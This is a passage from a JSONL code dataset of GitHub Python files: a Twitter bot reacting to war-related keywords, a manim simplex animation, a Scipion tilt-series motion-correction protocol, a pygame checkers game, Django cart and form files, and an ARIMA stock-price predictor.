{}'.format(status.user.screen_name, txt))\n # api.update_status(random.choice(ran))\n length = len(array)\n if not re.search(\"(RT)|(Reply)\",txt):\n array.append(txt)\n numb_tweet += 1\n print(length)\n # print(array)\n print(\"=={}==\".format(length))\n if length%delay_const == 0:\n length += 1\n print(\"\\n===============\\nBINGO!!!\\n================\")\n # print(self.generator(array))\n numb_tweet = 0\n api.update_status('{}'.format(self.generator(array)))\n # постим рандомную фразу в ответ\n def on_error(self, status_code):\n if status_code == 420:\n # если окажется, что мы посылаем слишком много запросов, то отсоединяемся\n return False\n # если какая-то другая ошибка, постараемся слушать поток дальше\n return True\n\nwar_listener = war_listener()\nmyStream = tweepy.Stream(auth = api.auth, listener=war_listener)\nmyStream.filter(track=['война','войну','войны','войне','войной'])\n\n","repo_name":"netkachevhum/homework","sub_path":"final project 2018 twitter bot/verse_bot.py","file_name":"verse_bot.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36924517318","text":"from typing import TYPE_CHECKING\n\nfrom app.bus import get_bus\nfrom app.compress import get_compressor\nfrom app.im import get_bots\nfrom app.logger import get_logger\n\nif TYPE_CHECKING:\n from logging import Logger\n from typing import TYPE_CHECKING, Dict\n\n from app._types import BotType\n from app.bus import IBus\n from app.compress import ICompressor\n from app.im import IBot\n\n\nclass IService:\n\n _bots: 'Dict[BotType, IBot]' = {}\n _logger: 'Logger' = None\n _name: str = None\n _message_bus: 'IBus' = None\n _compressor: 'ICompressor' = None\n\n def __init__(\n self,\n name: str = 'service'\n ):\n self._name = name\n self._logger = get_logger(name)\n self._bots = get_bots()\n self._compressor = get_compressor()\n self._message_bus = get_bus()\n\n self._logger.info(\n 'Init %s with Bots: %s, Compressor: %s, Message Bus: %s',\n self._name,\n list(map(lambda bot: bot.name, self._bots)),\n self._compressor.name,\n self._message_bus.name,\n )\n\n async def start(self):\n await self._message_bus.connect()\n\n async def stop(self):\n await self._message_bus.close()\n\n for bot in self._bots.values():\n await bot.destroy()\n\n self._logger.info('Service %s stopped', self._name)\n","repo_name":"ZeroTworu/bmq","sub_path":"app/domain/services/iservice.py","file_name":"iservice.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70177287147","text":"from math import frexp\r\nfrom manim import *\r\n\r\n\r\nconfig.background_color = \"#04f404\"\r\n\r\n\r\ntextColorNormal = WHITE\r\ntextColorPositive = \"#43b929\"\r\ntextColorNegative = \"#ff2e00\"\r\nlineColor = WHITE\r\naxesColor = WHITE\r\nvertexColor = \"#e6af2e\"\r\nselectedVertexColor = \"#058ed9\"\r\n\r\n\r\nclass SimplexOnScreenDispScene(MovingCameraScene):\r\n def construct(self):\r\n\r\n self.camera.frame.save_state()\r\n self.camera.frame.scale(0.95).shift(UP*0.6, RIGHT*1.5)\r\n\r\n axes = Axes(\r\n x_length= 14,\r\n y_length= 14*9/16,\r\n x_range=[-4*16/9, 10*16/9, 1],\r\n y_range=[-4, 10, 1],\r\n axis_config={\"color\":axesColor},\r\n # tips= False\r\n )\r\n\r\n axes_labels = axes.get_axis_labels()\r\n axes_labels.set_color(WHITE)\r\n\r\n\r\n constraint1 = axes.get_graph(lambda x: x+2, color = lineColor)\r\n constraint2 = axes.get_graph(lambda x: x/3+3, color = lineColor)\r\n constraint3 = axes.get_graph(lambda x: -3*x+18, color = lineColor)\r\n constraint4 = axes.get_graph(lambda x: x-3, color = lineColor)\r\n constraints = VGroup(constraint1, constraint2, constraint3,constraint4)\r\n \r\n\r\n dot1 = Dot([-3, -1.68, 0], color = vertexColor).scale(1.2)\r\n dot2 = Dot([-3, -0.55, 0], color = vertexColor).scale(1.2)\r\n dot3 = Dot([-2.15, 0.28, 0], color = vertexColor).scale(1.2)\r\n dot4 = Dot([-0.46, 0.85, 0], color = vertexColor).scale(1.2)\r\n dot5 = Dot([-0.05, -0.42, 0], color = vertexColor).scale(1.2)\r\n dot6 = Dot([-1.31, -1.68, 0], color = vertexColor).scale(1.2)\r\n \r\n selectedDot = Dot(ORIGIN, color = selectedVertexColor).scale(1.2)\r\n selectedDot.shift(dot2.get_center())\r\n \r\n vertices = VGroup(dot1, dot2, dot3, dot4, dot5, dot6)\r\n\r\n\r\n feasibleArea = Polygon([-3, -1.68, 0], [-3, -0.55, 0], [-2.15, 0.28, 0], [-0.465, 0.85, 0], [-0.05, -0.42, 0], [-1.31, -1.68, 0])\r\n feasibleArea.set_stroke(width=3, color = WHITE)\r\n feasibleArea.set_fill(PURPLE_A, opacity = 1)\r\n\r\n self.add(axes, axes_labels, feasibleArea, constraints, vertices)\r\n self.wait(3)\r\n\r\n self.play(ApplyMethod(dot1.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot2.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot3.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot4.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot5.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot6.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n\r\n self.wait(3)\r\n\r\n # self.play(ApplyMethod(dot1.set_color, vertexColor), ApplyMethod(dot2.set_color, vertexColor), ApplyMethod(dot6.set_color, vertexColor))\r\n self.play(FadeOut(dot1, dot2, dot6))\r\n self.wait(2)\r\n\r\n\r\n","repo_name":"D-setia/some1","sub_path":"simplexOnScreenDisp.py","file_name":"simplexOnScreenDisp.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1307209168","text":"# **************************************************************************\n# *\n# * Authors: J.M. De la Rosa Trevin (delarosatrevin@scilifelab.se) [1]\n# *\n# * [1] SciLifeLab, Stockholm University\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nimport os\nfrom os.path import abspath, relpath\n\nimport numpy as np\n\nimport pyworkflow as pw\nimport pyworkflow.protocol.params as params\nfrom pyworkflow.object import String, CsvList, Set\nfrom pyworkflow.utils import removeBaseExt\nfrom pyworkflow.utils.properties import Message\nfrom pwem.emlib.image import ImageHandler\n\nfrom ..objects import TiltSeries, TiltImage, SetOfTiltSeries\nfrom .protocol_ts_base import ProtTsProcess\n\nOUTPUT_TILT_SERIES_ODD = 'TiltSeriesOdd'\nOUTPUT_TILT_SERIES_EVEN = 'TiltSeriesEven'\nEVEN = 'even'\nODD = 'odd'\nOUTPUT_TILT_SERIES_DW = 'TiltSeriesDW'\n\n\nclass ProtTsCorrectMotion(ProtTsProcess):\n \"\"\"\n Base class for movie alignment protocols such as:\n motioncorr, crosscorrelation and optical flow\n\n Alignment parameters are defined in common. For example,\n the frames range used for alignment and final sum, the binning factor\n or the cropping options (region of interest)\n \"\"\"\n _possibleOutputs = {'outputTiltSeries': SetOfTiltSeries,\n OUTPUT_TILT_SERIES_DW: SetOfTiltSeries,\n OUTPUT_TILT_SERIES_EVEN: SetOfTiltSeries,\n OUTPUT_TILT_SERIES_ODD: SetOfTiltSeries}\n\n # Even / odd functionality\n evenOddCapable = False\n TiltSeriesOdd = None\n TiltSeriesEven = None\n TiltSeriesDW = None\n # -------------------------- DEFINE param functions -----------------------\n def _defineParams(self, form, addEvenOddParam = True):\n form.addSection(label=Message.LABEL_INPUT)\n\n form.addParam('inputTiltSeriesM', params.PointerParam,\n pointerClass='SetOfTiltSeriesM',\n important=True,\n label='Input Tilt-Series (movies)',\n help='Select input tilt-series movies that you want'\n 'to correct for beam-induced motion. ')\n\n group = form.addGroup('Alignment')\n line = group.addLine('Frames to ALIGN',\n help='Frames range to ALIGN on each movie. The '\n 'first frame is 1. If you set 0 in the final '\n 'frame to align, it means that you will '\n 'align until the last frame of the movie.')\n line.addParam('alignFrame0', params.IntParam, default=1,\n label='from')\n line.addParam('alignFrameN', params.IntParam, default=0,\n label='to')\n group.addParam('useAlignToSum', params.BooleanParam, default=True,\n label='Use ALIGN frames range to SUM?',\n help=\"If *Yes*, the same frame range will be used to \"\n \"ALIGN and to SUM. 
If *No*, you can selected a \"\n \"different range for SUM (must be a subset).\")\n line = group.addLine('Frames to SUM', condition=\"not useAlignToSum\",\n help='Frames range to SUM on each movie. The '\n 'first frame is 1. If you set 0 in the final '\n 'frame to sum, it means that you will sum '\n 'until the last frame of the movie.')\n line.addParam('sumFrame0', params.IntParam, default=1,\n label='from')\n line.addParam('sumFrameN', params.IntParam, default=0,\n label='to')\n group.addParam('binFactor', params.FloatParam, default=1.,\n label='Binning factor',\n help='1x or 2x. Bin stack before processing.')\n\n line = group.addLine('Crop offsets (px)',\n expertLevel=params.LEVEL_ADVANCED)\n line.addParam('cropOffsetX', params.IntParam, default=0, label='X')\n line.addParam('cropOffsetY', params.IntParam, default=0, label='Y')\n\n line = group.addLine('Crop dimensions (px)',\n expertLevel=params.LEVEL_ADVANCED,\n help='How many pixels to crop from offset\\n'\n 'If equal to 0, use maximum size.')\n line.addParam('cropDimX', params.IntParam, default=0, label='X')\n line.addParam('cropDimY', params.IntParam, default=0, label='Y')\n\n if self.evenOddCapable and addEvenOddParam:\n form.addParam('splitEvenOdd', params.BooleanParam,\n default=False,\n label='Split & sum odd/even frames?',\n help='(Used for denoising data preparation). If set to Yes, 2 additional movies/tilt '\n 'series will be generated, one generated from the even frames and the other from the '\n 'odd ones using the same alignment for the whole stack of frames.')\n\n form.addParallelSection(threads=4, mpi=1)\n\n # --------------------------- STEPS functions ----------------------------\n def convertInputStep(self, inputId):\n inputTs = self.inputTiltSeriesM.get()\n ih = ImageHandler()\n\n def _convert(path, tmpFn):\n if path:\n ih.convert(path, self._getTmpPath(tmpFn))\n\n _convert(inputTs.getGain(), 'gain.mrc')\n _convert(inputTs.getDark(), 'dark.mrc')\n\n def _doSplitEvenOdd(self):\n \"\"\" Returns if even/odd stuff has to be done\"\"\"\n if not self.evenOddCapable:\n return False\n else:\n return self.splitEvenOdd.get()\n\n def processTiltImageStep(self, tsId, tiltImageId, *args):\n tiltImageM = self._tsDict.getTi(tsId, tiltImageId)\n workingFolder = self.__getTiltImageMWorkingFolder(tiltImageM)\n pw.utils.makePath(workingFolder)\n self._processTiltImageM(workingFolder, tiltImageM, *args)\n\n if self._doSplitEvenOdd():\n baseName = removeBaseExt(tiltImageM.getFileName())\n evenName = abspath(self._getExtraPath(baseName + '_avg_' + EVEN))\n oddName = abspath(self._getExtraPath(baseName + '_avg_' + ODD))\n alignedFrameStack = self._getExtraPath(baseName + '_aligned_movie.mrcs')\n # Get even/odd xmd files\n args = '--img %s ' % abspath(alignedFrameStack)\n args += '--type frames '\n args += '-o %s ' % (evenName + '.xmd')\n args += '-e %s ' % (oddName + '.xmd')\n args += '--sum_frames '\n self.runJob('xmipp_image_odd_even', args)\n\n # Update even and odd average lists\n oddfn = oddName + '_aligned.mrc'\n evenfn = evenName + '_aligned.mrc'\n\n tiltImageM.setOddEven([oddfn, evenfn])\n pw.utils.cleanPath(alignedFrameStack)\n\n tiFn, tiFnDW = self._getOutputTiltImagePaths(tiltImageM)\n if not os.path.exists(tiFn):\n raise Exception(\"Expected output file '%s' not produced!\" % tiFn)\n\n if not pw.utils.envVarOn('SCIPION_DEBUG_NOCLEAN'):\n pw.utils.cleanPath(workingFolder)\n\n def createDWTs(self, ts):\n \"\"\" Dose weighting creation\"\"\"\n\n if self._createOutputWeightedTS():\n if self.TiltSeriesDW is None:\n self.TiltSeriesDW 
= self._createOutputSet(suffix='_dose-weighted')\n self.TiltSeriesDW.setSamplingRate(self._getOutputSampling())\n else:\n self.TiltSeriesDW.enableAppend()\n\n tsObjDW = TiltSeries()\n tsObjDW.copyInfo(ts, copyId=True)\n self.TiltSeriesDW.append(tsObjDW)\n\n tsFnDW = self._getDWTiltSeriesPath(ts)\n\n for i, ti in enumerate(ts):\n tiOut = TiltImage(location=(i+1, tsFnDW))\n tiOut.copyInfo(ti, copyId=True)\n tiOut.setAcquisition(ti.getAcquisition())\n tiOut.setSamplingRate(self._getOutputSampling())\n tiOut.setObjId(ti.getIndex())\n tsObjDW.append(tiOut)\n\n self.TiltSeriesDW.update(tsObjDW)\n\n def createOddEvenTs(self, ts, odd=True):\n def addTiltImage(tiLocation, tsObject, mainti, tsIde, samplingRate):\n \"\"\"\n :param tiLocation: Location of the aligned tilt image in the stack\n :param tsObject: Tilt Series to which the new Ti Image will be added\n :param mainti: Tilt Series Movies object\n :param tsIde: Tilt series identifier\n :param samplingRate: current Tilt Series sampling rate\n \"\"\"\n ta = mainti.getTiltAngle()\n to = mainti.getAcquisitionOrder()\n acq = mainti.getAcquisition()\n ti = TiltImage(tiltAngle=ta, tsId=tsIde, acquisitionOrder=to)\n ti.setSamplingRate(samplingRate)\n ti.setAcquisition(acq)\n index, fname = tiLocation.split(\"@\")\n ti.setLocation(int(index), fname)\n tsObject.append(ti)\n pw.utils.cleanPath(tiLocation)\n\n if odd:\n suffix = ODD\n outputAttr = OUTPUT_TILT_SERIES_ODD\n oddEvenIndex = 0\n else:\n suffix = EVEN\n outputAttr = OUTPUT_TILT_SERIES_EVEN\n oddEvenIndex = 1\n\n template = 'tiltseries%s.sqlite'\n sRate = self._getOutputSampling()\n\n output = getattr(self, outputAttr, None)\n if output:\n output.enableAppend()\n else:\n output = SetOfTiltSeries.create(self._getPath(), template=template, suffix=suffix)\n setattr(self, outputAttr, output)\n output.setSamplingRate(sRate)\n\n tsObj = TiltSeries()\n tsObj.copyInfo(ts, copyId=True)\n output.append(tsObj)\n\n tsId = ts.getTsId()\n for ti in ts:\n fnImg = ti.getOddEven()[oddEvenIndex]\n addTiltImage(fnImg, tsObj, ti, tsId, sRate)\n\n # update items and size info\n output.update(tsObj)\n\n def processTiltSeriesStep(self, tsId):\n \"\"\" Create a single stack with the tiltseries. 
\"\"\"\n def createStack(tiList, tsFn, fngetter, locationSetter=None):\n \"\"\" This function creates a stack from individual images \"\"\"\n for i, ti in enumerate(tiList):\n tiFn = fngetter(ti)\n #newLocation = (i + 1, tsFn)\n #ih.convert(tiFn, newLocation)\n #pw.utils.cleanPath(tiFn)\n if os.path.exists(tiFn):\n newLocation = (i + 1, tsFn)\n ih.convert(tiFn, newLocation)\n pw.utils.cleanPath(tiFn)\n if locationSetter:\n locationSetter(newLocation, ti)\n\n ts = self._tsDict.getTs(tsId)\n ts.setDim([])\n\n tiList = self._tsDict.getTiList(tsId)\n tiList.sort(key=lambda ti: ti.getTiltAngle())\n\n ih = ImageHandler()\n\n tsFn = self._getOutputTiltSeriesPath(ts)\n\n # Merge all micrographs from the same tilt images in a single \"mrcs\" stack file\n createStack(tiList, tsFn, self._getOutputTiltImagePath, locationSetter=lambda newloc, ti: ti.setLocation(newloc))\n\n # Dose weighted\n if self._createOutputWeightedTS():\n\n createStack(tiList, self._getDWTiltSeriesPath(ts), self._getOutputTiltImageDWPath)\n\n if self._doSplitEvenOdd():\n tsFnOdd = self._getOutputTiltSeriesPath(ts, '_odd')\n tsFnEven = self._getOutputTiltSeriesPath(ts, '_even')\n createStack(tiList, tsFnOdd, self._getOutputTiltImageOddPath,\n locationSetter=lambda newloc, ti: ti.setOdd(ih.locationToXmipp(newloc)))\n createStack(tiList, tsFnEven, self._getOutputTiltImageEvenPath,\n locationSetter=lambda newloc, ti: ti.setEven(ih.locationToXmipp(newloc)))\n\n self._tsDict.setFinished(tsId)\n\n def _getDWTiltSeriesPath(self, ts:TiltSeries):\n\n return self._getOutputTiltSeriesPath(ts, '_DW')\n\n def _updateOutput(self, tsIdList):\n \"\"\" Update the output set with the finished Tilt-series.\n Params:\n :param tsIdList: list of ids of finished tasks.\n \"\"\"\n\n def writeAndStore(obj):\n obj.write()\n self._store(obj)\n\n # Flag to check the first time we save output\n self._createOutput = getattr(self, '_createOutput', True)\n\n outputSet = self._getOutputSet()\n\n if outputSet is None:\n # Special case just to update the outputSet status\n # but it only makes sense when there is outputSet\n if not tsIdList:\n return\n outputSet = self._createOutputSet()\n else:\n outputSet.enableAppend()\n self._createOutput = False\n\n # Call the sub-class method to update the output\n outputSet.setSamplingRate(self._getOutputSampling())\n self._updateOutputSet(outputSet, tsIdList)\n outputSet.setStreamState(Set.STREAM_OPEN)\n\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.setStreamState(Set.STREAM_OPEN)\n self.TiltSeriesOdd.setStreamState(Set.STREAM_OPEN)\n\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.setStreamState(Set.STREAM_OPEN)\n\n if self._createOutput:\n outputSet.updateDim()\n outputs = {self._getOutputName(): outputSet}\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.updateDim()\n outputs.update({OUTPUT_TILT_SERIES_DW: self.TiltSeriesDW})\n\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.updateDim()\n self.TiltSeriesOdd.updateDim()\n outputs.update({OUTPUT_TILT_SERIES_EVEN: self.TiltSeriesEven,\n OUTPUT_TILT_SERIES_ODD: self.TiltSeriesOdd\n })\n self._defineOutputs(**outputs)\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesEven)\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesOdd)\n else:\n self._defineOutputs(**outputs)\n\n if self._createOutputWeightedTS():\n self._defineSourceRelation(self._getInputTsPointer(), self.TiltSeriesDW)\n\n self._defineSourceRelation(self._getInputTsPointer(), outputSet)\n self._createOutput = False\n else:\n writeAndStore(outputSet)\n 
if self._doSplitEvenOdd():\n writeAndStore(self.TiltSeriesEven)\n writeAndStore(self.TiltSeriesOdd)\n if self._createOutputWeightedTS():\n writeAndStore(self.TiltSeriesDW)\n\n outputSet.close()\n if self._doSplitEvenOdd():\n self.TiltSeriesEven.close()\n self.TiltSeriesOdd.close()\n\n if self._createOutputWeightedTS():\n self.TiltSeriesDW.close()\n\n if self._tsDict.allDone():\n self._coStep.setStatus(params.STATUS_NEW)\n\n def _updateOutputSet(self, outputSet, tsIdList):\n \"\"\" Override this method to convert the TiltSeriesM into TiltSeries.\n \"\"\"\n for tsId in tsIdList:\n ts = TiltSeries()\n ts.copyInfo(self._tsDict.getTs(tsId), copyId=True)\n ts.setSamplingRate(self._getOutputSampling())\n outputSet.append(ts)\n tList = self._tsDict.getTiList(tsId)\n ind = np.argsort([ti.getTiltAngle() for ti in tList])\n counter = 1\n\n for i in ind: # Make each row of the sqlite file be sorted by\n # index after having been sorted by angle previously, in order to avoid tilt image mismatching in\n # another operations, such as the fiducial alignment, which expects the sqlite to be sorted that way\n ti = tList[i]\n tiOut = TiltImage(location=(counter, ti.getFileName()))\n tiOut.copyInfo(ti, copyId=True)\n tiOut.setAcquisition(ti.getAcquisition())\n tiOut.setSamplingRate(self._getOutputSampling())\n tiOut.setObjId(ti.getIndex())\n ts.append(tiOut)\n counter += 1\n\n outputSet.update(ts)\n\n # Create dose weighted set\n self.createDWTs(ts)\n\n # Even and odd stuff\n if self._doSplitEvenOdd():\n self.createOddEvenTs(ts, True)\n self.createOddEvenTs(ts, False)\n\n # --------------------------- INFO functions ------------------------------\n def _validate(self):\n errors = []\n return errors\n\n def _summary(self):\n return [self.summaryVar.get('')]\n\n # --------------------------- UTILS functions ----------------------------\n def _initialize(self):\n inputTs = self._getInputTs()\n acq = inputTs.getAcquisition()\n gain, dark = self.getGainAndDark()\n self.__basicArgs = [\n acq.getDoseInitial(), acq.getDosePerFrame(), gain, dark]\n\n def _getArgs(self):\n return self.__basicArgs\n\n def _getInputTsPointer(self):\n return self.inputTiltSeriesM\n\n def _getOutputSampling(self):\n return self.inputTiltSeriesM.get().getSamplingRate() * self._getBinFactor()\n\n def _processTiltImageM(self, workingFolder, tiltImageM, *args):\n \"\"\" This function should be implemented in subclasses to really provide\n the processing step for this TiltSeries Movie.\n Output corrected image (and DW one) should be copied to expected name.\n \"\"\"\n pass\n\n def getGainAndDark(self):\n \"\"\" Return temporary paths of gain and dark if relevant. 
\"\"\"\n inputTs = self.inputTiltSeriesM.get()\n gain = os.path.abspath(self._getTmpPath('gain.mrc')) if inputTs.getGain() else None\n dark = os.path.abspath(self._getTmpPath('dark.mrc')) if inputTs.getDark() else None\n return gain, dark\n\n def _getFrameRange(self, n, prefix):\n \"\"\"\n Params:\n :param n: Number of frames of the movies\n :param prefix: what range we want to consider, either 'align' or 'sum'\n :return: (i, f) initial and last frame range\n \"\"\"\n # In case that the user select the same range for ALIGN and SUM\n # we also use the 'align' prefix\n if self._useAlignToSum():\n prefix = 'align'\n\n first = self.getAttributeValue('%sFrame0' % prefix)\n last = self.getAttributeValue('%sFrameN' % prefix)\n\n if first <= 1:\n first = 1\n\n if last <= 0:\n last = n\n\n return first, last\n\n def _getBinFactor(self):\n return self.getAttributeValue('binFactor', 1.0)\n\n # ----- Some internal functions ---------\n def _getTiltImageMRoot(self, tim):\n return '%s_%02d' % (tim.getTsId(), tim.getObjId())\n\n def __getTiltImageMWorkingFolder(self, tiltImageM):\n return self._getTmpPath(self._getTiltImageMRoot(tiltImageM))\n\n def _getOutputTiltImagePaths(self, tiltImageM):\n \"\"\" Return expected output path for correct movie and DW one.\n \"\"\"\n return self._getOutputTiltImagePath(tiltImageM), self._getOutputTiltImageDWPath(tiltImageM)\n\n def _getOutputTiltImagePath(self, tiltImageM):\n \"\"\" Return the main path for the tilt image corrected movie.\n \"\"\"\n return self._getExtraPath(self._getTiltImageMRoot(tiltImageM)) + '.mrc'\n\n def _getOutputTiltImageDWPath(self, tiltImageM):\n \"\"\" Return the main path for the tilt image dose weighted corrected movie.\n \"\"\"\n return self._getExtraPath(self._getTiltImageMRoot(tiltImageM)) + '_DW.mrc'\n\n def _getOutputTiltImageOddPath(self, tiltImageM):\n \"\"\" Return the path for the odd tilt image corrected movie.\n \"\"\"\n return tiltImageM.getOdd()\n\n def _getOutputTiltImageEvenPath(self, tiltImageM):\n \"\"\" Return the path for the even tilt image corrected movie.\n \"\"\"\n return tiltImageM.getEven()\n\n def _getOutputTiltSeriesPath(self, ts, suffix=''):\n return self._getExtraPath('%s%s.mrcs' % (ts.getTsId(), suffix))\n\n def _useAlignToSum(self):\n return True\n\n def _createOutputWeightedTS(self):\n return False\n\n\nclass ProtTsAverage(ProtTsCorrectMotion):\n \"\"\"\n Simple protocol to average TiltSeries movies as basic\n motion correction. It is used mainly for testing purposes.\n \"\"\"\n _label = 'average tilt-series movies'\n _devStatus = pw.BETA\n\n def _processTiltImageM(self, workingFolder, tiltImageM, *args):\n \"\"\" Simple add all frames and divide by its number. \"\"\"\n ih = ImageHandler()\n sumImg = ih.createImage()\n img = ih.createImage()\n\n n = tiltImageM.getNumberOfFrames()\n fn = tiltImageM.getFileName()\n\n sumImg.read((1, fn))\n\n for frame in range(2, n + 1):\n img.read((frame, fn))\n sumImg.inplaceAdd(img)\n\n # sumImg.inplaceDivide(float(n))\n outputFn = self._getOutputTiltImagePaths(tiltImageM)[0]\n sumImg.write(outputFn)\n","repo_name":"scipion-em/scipion-em-tomo","sub_path":"tomo/protocols/protocol_ts_correct_motion.py","file_name":"protocol_ts_correct_motion.py","file_ext":"py","file_size_in_byte":22035,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"29938896509","text":"import pygame\r\nfrom man.play import Game \r\nclass human:\r\n\r\n def get_position_input(self,pos,SQUARE_SIZE):\r\n self.x, self.y = pos\r\n self.row = self.y // SQUARE_SIZE\r\n self.col = self.x // SQUARE_SIZE\r\n return self.row, self.col\r\n\r\n def start(self):\r\n self.WIDTH, self.HEIGHT = 600, 600\r\n self.WIN = pygame.display.set_mode((self.WIDTH, self.HEIGHT))\r\n pygame.display.set_caption('Checkers')\r\n self.ROWS, self.COLS = 8, 8\r\n self.SQUARE_SIZE = self.WIDTH//self.COLS\r\n self.Orange=(255, 128, 0)\r\n self.FPS = 60\r\n run = True\r\n clock = pygame.time.Clock()\r\n game = Game(self.WIN)\r\n\r\n while run:\r\n clock.tick(self.FPS)\r\n\r\n if game.winner() != None:\r\n print(game.winner())\r\n run = False\r\n pygame.quit()\r\n for self.event in pygame.event.get():\r\n if self.event.type == pygame.QUIT:\r\n self.run = False\r\n pygame.quit()\r\n if self.event.type == pygame.MOUSEBUTTONDOWN:\r\n self.pos = pygame.mouse.get_pos()\r\n self.row, self.col = self.get_position_input(self.pos,self.SQUARE_SIZE)\r\n game.select(self.row, self.col)\r\n\r\n game.update()\r\n \r\n \r\n\r\n","repo_name":"Nkit-333/Checkers_game-GUI-Aritificial-intelligence-","sub_path":"man/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11973021347","text":"from django.urls.conf import path\nfrom .import views\nfrom os import name\n\n\nurlpatterns = [\n path('cart_view',views.cart_view,name = 'cart_view'),\n path('add_cart',views.add_cart, name='add_cart'),\n path('cartitem_dlt',views.cartitem_dlt, name='cartitem_dlt'),\n path('product_increment',views.product_increment, name='product_increment'),\n path('product_decrement',views.product_decrement, name='product_decrement'),\n path('checkout/',views.checkout, name='checkout')\n]\n","repo_name":"mejokkurian/ecommerce-website","sub_path":"cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71432424109","text":"#coding: utf-8\n\ndef load_from_pickle(): #загрузка объекта из файла\n import pickle\n \n try:\n with open ('data.pickle','rb') as f:\n data = pickle.load(f)\n is_empty = False\n except Exception as e: #если объекта ещё нет\n print(type(e))\n print('Database is empty!')\n data = []\n is_empty = True\n else:\n print('Data base is not empty! ')\n finally:\n f.close()\n return data,is_empty\n\ndef save_to_pickle(data): #сохранение в pickle\n import pickle\n\n with open ('data.pickle','wb') as f:\n pickle.dump(data,f) #запись объекта в файл\n\n f.close()\n","repo_name":"asokolkova/itmo_python","sub_path":"dz_5/cars/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"712587199","text":"from django import forms\nfrom .models import Proyecto,Alumno\nfrom superusuario.forms import UserForm\n\n\nclass MyProyectoForm(forms.ModelForm):\n class Meta:\n model = Proyecto\n fields = ('nombre', 'descripcion')\n widgets = {\n 'nombre': forms.TextInput(attrs={'class': 'form-control', 'require': 'require'}),\n 'descripcion': forms.Textarea(attrs={'class': 'form-control', 'require': 'require'}),\n }\n\nclass AlumnoSelfForm(forms.ModelForm):\n NoControl = forms.CharField(label='Matricula')\n class Meta(UserForm.Meta):\n fields = '__all__'","repo_name":"AlexSB664/ResideTec","sub_path":"alumno/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3914808929","text":"import numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom pandas import DataFrame\nfrom sklearn.metrics import mean_squared_error\n\ndef predict(symbol):\n # Read Stock Data\n current_path = pathlib.Path(__file__).parent.resolve()\n stock_csv_path = current_path.joinpath(\n '../datasets/{}.csv'\n .format(symbol.decode(\"utf-8\"))\n # .replace(\"b'\", \"\")\n # .replace(\"'\", \"\")\n )\n\n stock_data = pd.read_csv(stock_csv_path)\n\n # Grab Date & Close\n training_data = stock_data.iloc[-400:-60, [0, 4]]\n validation_data = stock_data.iloc[-60:, [0, 4]]\n\n # Split Test & Training\n training_items = training_data[\"Close\"].values\n testing_items = validation_data[\"Close\"].values\n\n # Build Model\n history = [x for x in training_items]\n model_predictions = []\n N_test_observations = len(testing_items)\n\n # Rolling Forecast\n for time_point in range(N_test_observations):\n model = ARIMA(history, order=(4,1,0))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output[0]\n model_predictions.append(yhat)\n true_test_value = testing_items[time_point]\n history.append(true_test_value)\n\n MSE_error = mean_squared_error(testing_items, model_predictions)\n print('Testing Mean Squared Error is {}'.format(MSE_error))\n\n model = ARIMA(history, order=(4,1,0))\n model_fit = model.fit()\n result = model_fit.forecast()[0]\n\n return str(result)\n","repo_name":"MikaAK/trading-tools","sub_path":"ai_predictor/priv/python/arima_model.py","file_name":"arima_model.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
